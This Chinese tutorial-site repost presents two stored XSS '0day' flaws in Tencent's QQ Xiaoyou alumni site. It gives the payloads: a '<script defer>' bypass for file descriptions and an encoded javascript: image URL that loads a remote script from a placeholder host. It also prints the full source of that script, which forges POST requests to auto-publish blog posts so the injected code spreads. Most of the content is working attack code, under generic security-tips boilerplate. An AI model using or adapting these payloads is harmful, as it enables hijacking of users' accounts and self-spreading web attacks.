三度网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

QQ校友XSS 0day及运用

时间:2022-8-2作者:未知来源:三度网教程人气:


随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。

作者已通知腾讯。

漏洞一:

qq校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。

qq校友使用了Ajax技术, 来显示文件列表。 在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。 由于使用了innerHTML, 所以直接插入代码: <script>alert('孤鸿影')</script>不会被执行。 使用下面的格式既可:<script defer>alert('孤鸿影')</script>。 加入defer属性, 那么浏览器在下载脚本的时候就不会立即对其进行处理, 而是继续对页面进行下载和解析。 这样我们插入的JavaScript就能正常运行。

漏洞二:

qq校友在发blog时对插入图片过滤不严格, 存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发:

javascript:document.write('%3C%73%63%72%69%70%74%20%73%72%63%3D%22http://xxxxxx.com/xy.js%22%3E%3C%2F%73%63%72%69%70%74%3E');xy.js的作用是自动发布一篇日志,这篇日志中可以插入恶意代码,代码如下:var url="/index.php?mod=blog&act=dopost";

var content="blog_content=By%3A%E5%AD%A4%E9%B8%BF%E5%BD%B1&blog_title=XSS+test&category=%E4%B8%AA%E4%BA%BA%E6%97%A5%E8%AE%B0";   //日志内容,这里可以插入恶意代码

function _sd_Post(Url,  Args)

{

var xmlhttp;

var error;

eval('try {xmlhttp  = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {xmlhttp  = null;error=e;}');

if(null != xmlhttp)

{

xmlhttp.Open("POST",  Url, false);

xmlhttp.setRequestHeader("x-requested-with",  "XMLHttpRequest");

xmlhttp.setRequestHeader("Referer",  "http://xy.qq.com/api_proxy.html");

xmlhttp.setRequestHeader("Accept",  "application/json, text/javascript, */*");

xmlhttp.setRequestHeader("Content-Type",  "application/x-www-form-urlencoded");

xmlhttp.setRequestHeader("Host",  "xy.qq.com");

xmlhttp.Send(Args);

strText = xmlhttp.responseText;

}

}

_sd_Post(url,content);


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

关键词:  QQ校友XSS  0day及运用





Copyright © 2012-2018 三度网教程(http://www.3du8.cn) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版